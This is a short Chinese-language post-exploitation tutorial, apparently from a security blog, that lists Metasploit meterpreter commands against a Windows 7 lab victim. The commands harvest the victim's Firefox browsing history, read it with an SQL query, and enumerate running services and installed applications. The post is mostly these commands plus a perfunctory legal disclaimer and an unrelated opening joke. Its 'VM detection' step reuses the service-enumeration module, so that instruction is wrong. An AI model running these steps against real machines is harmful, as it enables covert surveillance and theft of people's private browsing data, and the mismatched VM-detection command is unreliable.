内网渗透 -- 获取内网浏览器历史记录等相关信息

    技术2022-07-11  77

    “我喜欢你,做我女朋友可以吗?”

    电话的那头没有反应,男生沉不住气了,

    小心翼翼地问着,“你在干嘛呀?”

    “我在点头。”

    ----  网易云热评

     

    环境:小攻:Kali 2020,ip:192.168.1.133

              小受:win7 x86,ip:192.168.1.137

     

    一、生成木马及监听主机参考上篇文章:

     

     

    二、获取浏览器历史记录

    1、通过后渗透模块获取浏览器历史记录

    run post/windows/gather/forensics/browser_history

    2、打开拷贝到本地的文件

    /root/.msf4/local/aiyou_Firefox_wqsz7fg5.default-release_places.sqlite

    3、通过执行SQL获取小受浏览过的历史记录

    SELECT url FROM moz_places

    三、获取开启的服务

    run post/windows/gather/enum_services

     

    四、检测是否是虚拟机

    run post/windows/gather/enum_services

     

     

    五、查看安装了哪些应用

    run post/windows/gather/enum_applications

     

    禁止非法,后果自负

    欢迎关注公众号:web安全工具库

     

     

    Processed: 0.011, SQL: 9